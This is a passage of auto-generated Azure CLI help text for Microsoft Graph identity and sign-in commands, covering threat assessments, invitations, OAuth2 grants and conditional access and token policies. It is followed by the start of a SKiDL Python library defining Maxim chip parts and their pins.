always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'.
message: The result message for each threat assessment.
id: Read-only.
Multiple actions can be specified by using more than one --results argument.
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['identitysignins informationprotection delete-threat-assessment-request'] = """
type: command
short-summary: "Delete navigation property threatAssessmentRequests for informationProtection."
"""
helps['identitysignins informationprotection list-threat-assessment-request'] = """
type: command
short-summary: "Get threatAssessmentRequests from informationProtection."
"""
helps['identitysignins informationprotection show-threat-assessment-request'] = """
type: command
short-summary: "Get threatAssessmentRequests from informationProtection."
"""
helps['identitysignins informationprotection update-threat-assessment-request'] = """
type: command
short-summary: "Update the navigation property threatAssessmentRequests in informationProtection."
parameters:
- name: --results
short-summary: "A collection of threat assessment results. Read-only. By default, a GET \
/threatAssessmentRequests/{id} does not return this property unless you apply $expand on it."
long-summary: |
Usage: --results created-date-time=XX message=XX result-type=XX id=XX
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'.
message: The result message for each threat assessment.
id: Read-only.
Multiple actions can be specified by using more than one --results argument.
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['identitysignins informationprotectionthreatassessmentrequest'] = """
type: group
short-summary: Manage informationprotectionthreatassessmentrequest with identitysignins
"""
helps['identitysignins informationprotectionthreatassessmentrequest create-result'] = """
type: command
short-summary: "Create new navigation property to results for informationProtection."
"""
helps['identitysignins informationprotectionthreatassessmentrequest delete-result'] = """
type: command
short-summary: "Delete navigation property results for informationProtection."
"""
helps['identitysignins informationprotectionthreatassessmentrequest list-result'] = """
type: command
short-summary: "Get results from informationProtection."
"""
helps['identitysignins informationprotectionthreatassessmentrequest show-result'] = """
type: command
short-summary: "Get results from informationProtection."
"""
helps['identitysignins informationprotectionthreatassessmentrequest update-result'] = """
type: command
short-summary: "Update the navigation property results in informationProtection."
"""
helps['identitysignins invitationsinvitation'] = """
type: group
short-summary: Manage invitationsinvitation with identitysignins
"""
helps['identitysignins invitationsinvitation create-invitation'] = """
type: command
short-summary: "Add new entity to invitations."
"""
helps['identitysignins invitationsinvitation delete-invitation'] = """
type: command
short-summary: "Delete entity from invitations."
"""
helps['identitysignins invitationsinvitation list-invitation'] = """
type: command
short-summary: "Get entities from invitations."
"""
helps['identitysignins invitationsinvitation show-invitation'] = """
type: command
short-summary: "Get entity from invitations by key."
"""
helps['identitysignins invitationsinvitation update-invitation'] = """
type: command
short-summary: "Update entity in invitations."
"""
helps['identitysignins invitation'] = """
type: group
short-summary: Manage invitation with identitysignins
"""
helps['identitysignins invitation delete-ref-invited-user'] = """
type: command
short-summary: "Delete ref of navigation property invitedUser for invitations."
"""
helps['identitysignins invitation set-ref-invited-user'] = """
type: command
short-summary: "Update the ref of navigation property invitedUser in invitations."
"""
helps['identitysignins invitation show-invited-user'] = """
type: command
short-summary: "Get invitedUser from invitations."
"""
helps['identitysignins invitation show-ref-invited-user'] = """
type: command
short-summary: "Get ref of invitedUser from invitations."
"""
helps['identitysignins oauth2permissiongrantsoauth2permissiongrant'] = """
type: group
short-summary: Manage oauth2permissiongrantsoauth2permissiongrant with identitysignins
"""
helps['identitysignins oauth2permissiongrantsoauth2permissiongrant create-o-auth2-permission-grant'] = """
type: command
short-summary: "Add new entity to oauth2PermissionGrants."
"""
helps['identitysignins oauth2permissiongrantsoauth2permissiongrant delete-o-auth2-permission-grant'] = """
type: command
short-summary: "Delete entity from oauth2PermissionGrants."
"""
helps['identitysignins oauth2permissiongrantsoauth2permissiongrant list-o-auth2-permission-grant'] = """
type: command
short-summary: "Get entities from oauth2PermissionGrants."
"""
helps['identitysignins oauth2permissiongrantsoauth2permissiongrant show-o-auth2-permission-grant'] = """
type: command
short-summary: "Get entity from oauth2PermissionGrants by key."
"""
helps['identitysignins oauth2permissiongrantsoauth2permissiongrant update-o-auth2-permission-grant'] = """
type: command
short-summary: "Update entity in oauth2PermissionGrants."
"""
helps['identitysignins oauth2permissiongrant'] = """
type: group
short-summary: Manage oauth2permissiongrant with identitysignins
"""
helps['identitysignins oauth2permissiongrant delta'] = """
type: command
short-summary: "Invoke function delta."
"""
helps['identitysignins organization'] = """
type: group
short-summary: Manage organization with identitysignins
"""
helps['identitysignins organization create-ref-certificate-based-auth-configuration'] = """
type: command
short-summary: "Create new navigation property ref to certificateBasedAuthConfiguration for organization."
"""
helps['identitysignins organization list-certificate-based-auth-configuration'] = """
type: command
short-summary: "Get certificateBasedAuthConfiguration from organization."
"""
helps['identitysignins organization list-ref-certificate-based-auth-configuration'] = """
type: command
short-summary: "Get ref of certificateBasedAuthConfiguration from organization."
"""
helps['identitysignins policiespolicyroot'] = """
type: group
short-summary: Manage policiespolicyroot with identitysignins
"""
helps['identitysignins policiespolicyroot show-policy-root'] = """
type: command
short-summary: "Get policies."
"""
helps['identitysignins policiespolicyroot update-policy-root'] = """
type: command
short-summary: "Update policies."
parameters:
- name: --activity-based-timeout-policies
long-summary: |
Usage: --activity-based-timeout-policies definition=XX is-organization-default=XX applies-to=XX \
description=XX display-name=XX deleted-date-time=XX id=XX
definition: A string collection containing a JSON string that defines the rules and settings for a policy. \
The syntax for the definition differs for each derived policy type. Required.
is-organization-default: If set to true, activates this policy. There can be many policies for the same \
policy type, but only one can be activated as the organization default. Optional, default value is false.
description: Description for this policy.
display-name: Display name for this policy.
id: Read-only.
Multiple actions can be specified by using more than one --activity-based-timeout-policies argument.
- name: --claims-mapping-policies
long-summary: |
Usage: --claims-mapping-policies definition=XX is-organization-default=XX applies-to=XX description=XX \
display-name=XX deleted-date-time=XX id=XX
definition: A string collection containing a JSON string that defines the rules and settings for a policy. \
The syntax for the definition differs for each derived policy type. Required.
is-organization-default: If set to true, activates this policy. There can be many policies for the same \
policy type, but only one can be activated as the organization default. Optional, default value is false.
description: Description for this policy.
display-name: Display name for this policy.
id: Read-only.
Multiple actions can be specified by using more than one --claims-mapping-policies argument.
- name: --home-realm-discovery-policies
long-summary: |
Usage: --home-realm-discovery-policies definition=XX is-organization-default=XX applies-to=XX \
description=XX display-name=XX deleted-date-time=XX id=XX
definition: A string collection containing a JSON string that defines the rules and settings for a policy. \
The syntax for the definition differs for each derived policy type. Required.
is-organization-default: If set to true, activates this policy. There can be many policies for the same \
policy type, but only one can be activated as the organization default. Optional, default value is false.
description: Description for this policy.
display-name: Display name for this policy.
id: Read-only.
Multiple actions can be specified by using more than one --home-realm-discovery-policies argument.
- name: --token-issuance-policies
long-summary: |
Usage: --token-issuance-policies definition=XX is-organization-default=XX applies-to=XX description=XX \
display-name=XX deleted-date-time=XX id=XX
definition: A string collection containing a JSON string that defines the rules and settings for a policy. \
The syntax for the definition differs for each derived policy type. Required.
is-organization-default: If set to true, activates this policy. There can be many policies for the same \
policy type, but only one can be activated as the organization default. Optional, default value is false.
description: Description for this policy.
display-name: Display name for this policy.
id: Read-only.
Multiple actions can be specified by using more than one --token-issuance-policies argument.
- name: --token-lifetime-policies
long-summary: |
Usage: --token-lifetime-policies definition=XX is-organization-default=XX applies-to=XX description=XX \
display-name=XX deleted-date-time=XX id=XX
definition: A string collection containing a JSON string that defines the rules and settings for a policy. \
The syntax for the definition differs for each derived policy type. Required.
is-organization-default: If set to true, activates this policy. There can be many policies for the same \
policy type, but only one can be activated as the organization default. Optional, default value is false.
description: Description for this policy.
display-name: Display name for this policy.
id: Read-only.
Multiple actions can be specified by using more than one --token-lifetime-policies argument.
- name: --identity-security-defaults-enforcement-policy
short-summary: "identitySecurityDefaultsEnforcementPolicy"
long-summary: |
Usage: --identity-security-defaults-enforcement-policy is-enabled=XX description=XX display-name=XX \
deleted-date-time=XX id=XX
is-enabled: If set to true, Azure Active Directory security defaults is enabled for the tenant.
description: Description for this policy.
display-name: Display name for this policy.
id: Read-only.
"""
helps['identitysignins policy'] = """
type: group
short-summary: Manage policy with identitysignins
"""
helps['identitysignins policy create-activity-based-timeout-policy'] = """
type: command
short-summary: "Create new navigation property to activityBasedTimeoutPolicies for policies."
parameters:
- name: --applies-to
long-summary: |
Usage: --applies-to deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --applies-to argument.
"""
helps['identitysignins policy create-claim-mapping-policy'] = """
type: command
short-summary: "Create new navigation property to claimsMappingPolicies for policies."
parameters:
- name: --applies-to
long-summary: |
Usage: --applies-to deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --applies-to argument.
"""
helps['identitysignins policy create-conditional-access-policy'] = """
type: command
short-summary: "Create new navigation property to conditionalAccessPolicies for policies."
parameters:
- name: --grant-controls
short-summary: "conditionalAccessGrantControls"
long-summary: |
Usage: --grant-controls built-in-controls=XX custom-authentication-factors=XX operator=XX terms-of-use=XX
built-in-controls: List of values of built-in controls required by the policy. Possible values: Block, \
Mfa, CompliantDevice, DomainJoinedDevice, ApprovedApplication, CompliantApplication
custom-authentication-factors: List of custom controls IDs required by the policy. For more information, \
see Custom controls.
operator: Defines the relationship of the grant controls. Possible values: AND, OR.
terms-of-use: List of terms of use IDs required by the policy.
- name: --application-enforced-restrictions
short-summary: "applicationEnforcedRestrictionsSessionControl"
long-summary: |
Usage: --application-enforced-restrictions is-enabled=XX
is-enabled: Specifies whether the session control is enabled.
- name: --cloud-app-security
short-summary: "cloudAppSecuritySessionControl"
long-summary: |
Usage: --cloud-app-security cloud-app-security-type=XX is-enabled=XX
cloud-app-security-type: Possible values are: mcasConfigured, monitorOnly, blockDownloads, unknownFutureValue.
is-enabled: Specifies whether the session control is enabled.
- name: --persistent-browser
short-summary: "persistentBrowserSessionControl"
long-summary: |
Usage: --persistent-browser mode=XX is-enabled=XX
mode: Possible values are: always, never.
is-enabled: Specifies whether the session control is enabled.
- name: --sign-in-frequency
short-summary: "signInFrequencySessionControl"
long-summary: |
Usage: --sign-in-frequency type=XX value=XX is-enabled=XX
type: Possible values are: days, hours.
value: The number of days or hours.
is-enabled: Specifies whether the session control is enabled.
- name: --applications
short-summary: "conditionalAccessApplications"
long-summary: |
Usage: --applications exclude-applications=XX include-applications=XX include-user-actions=XX
exclude-applications: The list of application IDs explicitly excluded from the policy.
include-applications: The list of application IDs the policy applies to, unless explicitly excluded (in \
excludeApplications). Can also be set to All.
include-user-actions: User actions to include. For example, urn:user:registersecurityinfo
- name: --locations
short-summary: "conditionalAccessLocations"
long-summary: |
Usage: --locations exclude-locations=XX include-locations=XX
exclude-locations: Location IDs excluded from scope of policy.
include-locations: Location IDs in scope of policy unless explicitly excluded, All, or AllTrusted.
- name: --platforms
short-summary: "conditionalAccessPlatforms"
long-summary: |
Usage: --platforms exclude-platforms=XX include-platforms=XX
exclude-platforms: Possible values are: android, iOS, windows, windowsPhone, macOS, unknownFutureValue.
include-platforms: Possible values are: android, iOS, windows, windowsPhone, macOS, all, \
unknownFutureValue.
- name: --users
short-summary: "conditionalAccessUsers"
long-summary: |
Usage: --users exclude-groups=XX exclude-roles=XX exclude-users=XX include-groups=XX include-roles=XX \
include-users=XX
exclude-groups: Group IDs excluded from scope of policy.
exclude-roles: Role IDs excluded from scope of policy.
exclude-users: User IDs excluded from scope of policy and/or GuestsOrExternalUsers.
include-groups: Group IDs in scope of policy unless explicitly excluded, or All.
include-roles: Role IDs in scope of policy unless explicitly excluded, or All.
include-users: User IDs in scope of policy unless explicitly excluded, or None or All or \
GuestsOrExternalUsers.
"""
helps['identitysignins policy create-home-realm-discovery-policy'] = """
type: command
short-summary: "Create new navigation property to homeRealmDiscoveryPolicies for policies."
parameters:
- name: --applies-to
long-summary: |
Usage: --applies-to deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --applies-to argument.
"""
helps['identitysignins policy create-permission-grant-policy'] = """
type: command
short-summary: "Create new navigation property to permissionGrantPolicies for policies."
parameters:
- name: --excludes
long-summary: |
Usage: --excludes client-application-ids=XX client-application-publisher-ids=XX \
client-applications-from-verified-publisher-only=XX client-application-tenant-ids=XX permission-classification=XX \
permissions=XX permission-type=XX resource-application=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --excludes argument.
- name: --includes
long-summary: |
Usage: --includes client-application-ids=XX client-application-publisher-ids=XX \
client-applications-from-verified-publisher-only=XX client-application-tenant-ids=XX permission-classification=XX \
permissions=XX permission-type=XX resource-application=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --includes argument.
"""
helps['identitysignins policy create-token-issuance-policy'] = """
type: command
short-summary: "Create new navigation property to tokenIssuancePolicies for policies."
parameters:
- name: --applies-to
long-summary: |
Usage: --applies-to deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --applies-to argument.
"""
helps['identitysignins policy create-token-lifetime-policy'] = """
type: command
short-summary: "Create new navigation property to tokenLifetimePolicies for policies."
parameters:
- name: --applies-to
long-summary: |
Usage: --applies-to deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --applies-to argument.
"""
helps['identitysignins policy delete-activity-based-timeout-policy'] = """
type: command
short-summary: "Delete navigation property activityBasedTimeoutPolicies for policies."
"""
helps['identitysignins policy delete-claim-mapping-policy'] = """
type: command
short-summary: "Delete navigation property claimsMappingPolicies for policies."
"""
helps['identitysignins policy delete-conditional-access-policy'] = """
type: command
short-summary: "Delete navigation property conditionalAccessPolicies for policies."
"""
helps['identitysignins policy delete-home-realm-discovery-policy'] = """
type: command
short-summary: "Delete navigation property homeRealmDiscoveryPolicies for policies."
"""
helps['identitysignins policy delete-identity-security-default-enforcement-policy'] = """
type: command
short-summary: "Delete navigation property identitySecurityDefaultsEnforcementPolicy for policies."
"""
helps['identitysignins policy delete-permission-grant-policy'] = """
type: command
short-summary: "Delete navigation property permissionGrantPolicies for policies."
"""
helps['identitysignins policy delete-token-issuance-policy'] = """
type: command
short-summary: "Delete navigation property tokenIssuancePolicies for policies."
"""
helps['identitysignins policy delete-token-lifetime-policy'] = """
type: command
short-summary: "Delete navigation property tokenLifetimePolicies for policies."
"""
helps['identitysignins policy list-activity-based-timeout-policy'] = """
type: command
short-summary: "Get activityBasedTimeoutPolicies from policies."
"""
helps['identitysignins policy list-claim-mapping-policy'] = """
type: command
short-summary: "Get claimsMappingPolicies from policies."
"""
helps['identitysignins policy list-conditional-access-policy'] = """
type: command
short-summary: "Get conditionalAccessPolicies from policies."
"""
helps['identitysignins policy list-home-realm-discovery-policy'] = """
type: command
short-summary: "Get homeRealmDiscoveryPolicies from policies."
"""
helps['identitysignins policy list-permission-grant-policy'] = """
type: command
short-summary: "Get permissionGrantPolicies from policies."
"""
helps['identitysignins policy list-token-issuance-policy'] = """
type: command
short-summary: "Get tokenIssuancePolicies from policies."
"""
helps['identitysignins policy list-token-lifetime-policy'] = """
type: command
short-summary: "Get tokenLifetimePolicies from policies."
"""
helps['identitysignins policy show-activity-based-timeout-policy'] = """
type: command
short-summary: "Get activityBasedTimeoutPolicies from policies."
"""
helps['identitysignins policy show-claim-mapping-policy'] = """
type: command
short-summary: "Get claimsMappingPolicies from policies."
"""
helps['identitysignins policy show-conditional-access-policy'] = """
type: command
short-summary: "Get conditionalAccessPolicies from policies."
"""
helps['identitysignins policy show-home-realm-discovery-policy'] = """
type: command
short-summary: "Get homeRealmDiscoveryPolicies from policies."
"""
helps['identitysignins policy show-identity-security-default-enforcement-policy'] = """
type: command
short-summary: "Get identitySecurityDefaultsEnforcementPolicy from policies."
"""
helps['identitysignins policy show-permission-grant-policy'] = """
type: command
short-summary: "Get permissionGrantPolicies from policies."
"""
helps['identitysignins policy show-token-issuance-policy'] = """
type: command
short-summary: "Get tokenIssuancePolicies from policies."
"""
helps['identitysignins policy show-token-lifetime-policy'] = """
type: command
short-summary: "Get tokenLifetimePolicies from policies."
"""
helps['identitysignins policy update-activity-based-timeout-policy'] = """
type: command
short-summary: "Update the navigation property activityBasedTimeoutPolicies in policies."
parameters:
- name: --applies-to
long-summary: |
Usage: --applies-to deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --applies-to argument.
"""
helps['identitysignins policy update-claim-mapping-policy'] = """
type: command
short-summary: "Update the navigation property claimsMappingPolicies in policies."
parameters:
- name: --applies-to
long-summary: |
Usage: --applies-to deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --applies-to argument.
"""
helps['identitysignins policy update-conditional-access-policy'] = """
type: command
short-summary: "Update the navigation property conditionalAccessPolicies in policies."
parameters:
- name: --grant-controls
short-summary: "conditionalAccessGrantControls"
long-summary: |
Usage: --grant-controls built-in-controls=XX custom-authentication-factors=XX operator=XX terms-of-use=XX
built-in-controls: List of values of built-in controls required by the policy. Possible values: Block, \
Mfa, CompliantDevice, DomainJoinedDevice, ApprovedApplication, CompliantApplication
custom-authentication-factors: List of custom controls IDs required by the policy. For more information, \
see Custom controls.
operator: Defines the relationship of the grant controls. Possible values: AND, OR.
terms-of-use: List of terms of use IDs required by the policy.
- name: --application-enforced-restrictions
short-summary: "applicationEnforcedRestrictionsSessionControl"
long-summary: |
Usage: --application-enforced-restrictions is-enabled=XX
is-enabled: Specifies whether the session control is enabled.
- name: --cloud-app-security
short-summary: "cloudAppSecuritySessionControl"
long-summary: |
Usage: --cloud-app-security cloud-app-security-type=XX is-enabled=XX
cloud-app-security-type: Possible values are: mcasConfigured, monitorOnly, blockDownloads, unknownFutureValue.
is-enabled: Specifies whether the session control is enabled.
- name: --persistent-browser
short-summary: "persistentBrowserSessionControl"
long-summary: |
Usage: --persistent-browser mode=XX is-enabled=XX
mode: Possible values are: always, never.
is-enabled: Specifies whether the session control is enabled.
- name: --sign-in-frequency
short-summary: "signInFrequencySessionControl"
long-summary: |
Usage: --sign-in-frequency type=XX value=XX is-enabled=XX
type: Possible values are: days, hours.
value: The number of days or hours.
is-enabled: Specifies whether the session control is enabled.
- name: --applications
short-summary: "conditionalAccessApplications"
long-summary: |
Usage: --applications exclude-applications=XX include-applications=XX include-user-actions=XX
exclude-applications: The list of application IDs explicitly excluded from the policy.
include-applications: The list of application IDs the policy applies to, unless explicitly excluded (in \
excludeApplications). Can also be set to All.
include-user-actions: User actions to include. For example, urn:user:registersecurityinfo
- name: --locations
short-summary: "conditionalAccessLocations"
long-summary: |
Usage: --locations exclude-locations=XX include-locations=XX
exclude-locations: Location IDs excluded from scope of policy.
include-locations: Location IDs in scope of policy unless explicitly excluded, All, or AllTrusted.
- name: --platforms
short-summary: "conditionalAccessPlatforms"
long-summary: |
Usage: --platforms exclude-platforms=XX include-platforms=XX
exclude-platforms: Possible values are: android, iOS, windows, windowsPhone, macOS, unknownFutureValue.
include-platforms: Possible values are: android, iOS, windows, windowsPhone, macOS, all, \
unknownFutureValue.
- name: --users
short-summary: "conditionalAccessUsers"
long-summary: |
Usage: --users exclude-groups=XX exclude-roles=XX exclude-users=XX include-groups=XX include-roles=XX \
include-users=XX
exclude-groups: Group IDs excluded from scope of policy.
exclude-roles: Role IDs excluded from scope of policy.
exclude-users: User IDs excluded from scope of policy and/or GuestsOrExternalUsers.
include-groups: Group IDs in scope of policy unless explicitly excluded, or All.
include-roles: Role IDs in scope of policy unless explicitly excluded, or All.
include-users: User IDs in scope of policy unless explicitly excluded, or None or All or \
GuestsOrExternalUsers.
"""
helps['identitysignins policy update-home-realm-discovery-policy'] = """
type: command
short-summary: "Update the navigation property homeRealmDiscoveryPolicies in policies."
parameters:
- name: --applies-to
long-summary: |
Usage: --applies-to deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --applies-to argument.
"""
helps['identitysignins policy update-identity-security-default-enforcement-policy'] = """
type: command
short-summary: "Update the navigation property identitySecurityDefaultsEnforcementPolicy in policies."
"""
helps['identitysignins policy update-permission-grant-policy'] = """
type: command
short-summary: "Update the navigation property permissionGrantPolicies in policies."
parameters:
- name: --excludes
long-summary: |
Usage: --excludes client-application-ids=XX client-application-publisher-ids=XX \
client-applications-from-verified-publisher-only=XX client-application-tenant-ids=XX permission-classification=XX \
permissions=XX permission-type=XX resource-application=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --excludes argument.
- name: --includes
long-summary: |
Usage: --includes client-application-ids=XX client-application-publisher-ids=XX \
client-applications-from-verified-publisher-only=XX client-application-tenant-ids=XX permission-classification=XX \
permissions=XX permission-type=XX resource-application=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --includes argument.
"""
helps['identitysignins policy update-token-issuance-policy'] = """
type: command
short-summary: "Update the navigation property tokenIssuancePolicies in policies."
parameters:
- name: --applies-to
long-summary: |
Usage: --applies-to deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --applies-to argument.
"""
helps['identitysignins policy update-token-lifetime-policy'] = """
type: command
short-summary: "Update the navigation property tokenLifetimePolicies in policies."
parameters:
- name: --applies-to
long-summary: |
Usage: --applies-to deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --applies-to argument.
"""
helps['identitysignins policiespermissiongrantpolicy'] = """
type: group
short-summary: Manage policiespermissiongrantpolicy with identitysignins
"""
helps['identitysignins policiespermissiongrantpolicy create-exclude'] = """
type: command
short-summary: "Create new navigation property to excludes for policies."
"""
helps['identitysignins policiespermissiongrantpolicy create-include'] = """
type: command
short-summary: "Create new navigation property to includes for policies."
"""
helps['identitysignins policiespermissiongrantpolicy delete-exclude'] = """
type: command
short-summary: "Delete navigation property excludes for policies."
"""
helps['identitysignins policiespermissiongrantpolicy delete-include'] = """
type: command
short-summary: "Delete navigation property includes for policies."
"""
helps['identitysignins policiespermissiongrantpolicy list-exclude'] = """
type: command
short-summary: "Get excludes from policies."
"""
helps['identitysignins policiespermissiongrantpolicy list-include'] = """
type: command
short-summary: "Get includes from policies."
"""
helps['identitysignins policiespermissiongrantpolicy show-exclude'] = """
type: command
short-summary: "Get excludes from policies."
"""
helps['identitysignins policiespermissiongrantpolicy show-include'] = """
type: command
short-summary: "Get includes from policies."
"""
helps['identitysignins policiespermissiongrantpolicy update-exclude'] = """
type: command
short-summary: "Update the navigation property excludes in policies."
"""
helps['identitysignins policiespermissiongrantpolicy update-include'] = """
type: command
short-summary: "Update the navigation property includes in policies."
"""
56c014faadf327e9e07439242b558cded6ec62d7 | 14098 | py | Python | skidl/libs/maxim_sklib.py | arjenroodselaar/skidl | ["MIT"] | 700 stars | 118 issues | 94 forks
from skidl import SKIDL, TEMPLATE, Part, Pin, SchLib
SKIDL_lib_version = '0.0.1'
maxim = SchLib(tool=SKIDL).add_parts(*[
Part(name='DS1267_DIP',dest=TEMPLATE,tool=SKIDL,keywords='Dual Digital Potentiometer Maxim',description='Dual Digital Potentiometer, Serial, 256 Steps, DIP-14',ref_prefix='U',num_units=1,fplist=['DIP*W7.62mm*'],do_erc=True,pins=[
Pin(num='1',name='VB',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='H1',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='L1',func=Pin.PASSIVE,do_erc=True),
Pin(num='4',name='W1',func=Pin.PASSIVE,do_erc=True),
Pin(num='5',name='~Reset',do_erc=True),
Pin(num='6',name='CLK',do_erc=True),
Pin(num='7',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='8',name='DQ',do_erc=True),
Pin(num='9',name='COUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='10',name='L0',func=Pin.PASSIVE,do_erc=True),
Pin(num='11',name='H0',func=Pin.PASSIVE,do_erc=True),
Pin(num='12',name='W0',func=Pin.PASSIVE,do_erc=True),
Pin(num='13',name='SOUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='14',name='VCC',func=Pin.PWRIN,do_erc=True)]),
Part(name='DS1267_SOIC',dest=TEMPLATE,tool=SKIDL,keywords='Dual Digital Potentiometer Maxim',description='Dual Digital Potentiometer, Serial, 256 Steps, SOIC-16',ref_prefix='U',num_units=1,fplist=['SOIC*3.9x9.9mm*1.27mm'],do_erc=True,pins=[
Pin(num='1',name='VB',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='3',name='H1',func=Pin.PASSIVE,do_erc=True),
Pin(num='4',name='L1',func=Pin.PASSIVE,do_erc=True),
Pin(num='5',name='W1',func=Pin.PASSIVE,do_erc=True),
Pin(num='6',name='~Reset',do_erc=True),
Pin(num='7',name='CLK',do_erc=True),
Pin(num='8',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='9',name='DQ',do_erc=True),
Pin(num='10',name='COUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='11',name='L0',func=Pin.PASSIVE,do_erc=True),
Pin(num='12',name='W0',func=Pin.PASSIVE,do_erc=True),
Pin(num='13',name='H0',func=Pin.PASSIVE,do_erc=True),
Pin(num='14',name='SOUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='15',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='16',name='VCC',func=Pin.PWRIN,do_erc=True)]),
Part(name='DS1267_TSSOP',dest=TEMPLATE,tool=SKIDL,keywords='Dual Digital Potentiometer Maxim',description='Dual Digital Potentiometer, Serial, 256 Steps, TSSOP-20',ref_prefix='U',num_units=1,fplist=['TSSOP*4.4x6.5mm*0.65mm*'],do_erc=True,pins=[
Pin(num='1',name='VB',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='3',name='H1',func=Pin.PASSIVE,do_erc=True),
Pin(num='4',name='L1',func=Pin.PASSIVE,do_erc=True),
Pin(num='5',name='W1',func=Pin.PASSIVE,do_erc=True),
Pin(num='6',name='~Reset',do_erc=True),
Pin(num='7',name='CLK',do_erc=True),
Pin(num='8',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='9',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='10',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='20',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='11',name='DQ',do_erc=True),
Pin(num='12',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='13',name='COUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='14',name='L0',func=Pin.PASSIVE,do_erc=True),
Pin(num='15',name='H0',func=Pin.PASSIVE,do_erc=True),
Pin(num='16',name='W0',func=Pin.PASSIVE,do_erc=True),
Pin(num='17',name='SOUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='18',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='19',name='NC',func=Pin.NOCONNECT,do_erc=True)]),
Part(name='DS1302',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='DS1307+',dest=TEMPLATE,tool=SKIDL,do_erc=True,aliases=['DS1307N+', 'DS1307Z+']),
Part(name='DS1602',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='DS1621',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='DS1804',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='DS1822Z',dest=TEMPLATE,tool=SKIDL,keywords='OneWire 1Wire Dallas Maxim',description='High-Precision 1-Wire Digital Thermometer SOIC-8',ref_prefix='U',num_units=1,fplist=['SOIC-8_3.9x4.9mm_Pitch1.27mm', 'SOIC-8_3.9x4.9mm_Pitch1.27mm*'],do_erc=True,aliases=['DS18B20Z', 'DS18S20Z'],pins=[
Pin(num='3',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='4',name='DQ',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='DS1825',dest=TEMPLATE,tool=SKIDL,keywords='1Wire OneWire Maxim Dallas',description='Programmable Resolution 1-Wire Digital Thermometer With 4-Bit ID',ref_prefix='U',num_units=1,fplist=['MSOP-8_3x3mm_Pitch0.65mm', 'MSOP-8_3x3mm_Pitch0.65mm*'],do_erc=True,pins=[
Pin(num='1',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='DQ',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='5',name='AD0',do_erc=True),
Pin(num='6',name='AD1',do_erc=True),
Pin(num='7',name='AD2',do_erc=True),
Pin(num='8',name='AD3',do_erc=True)]),
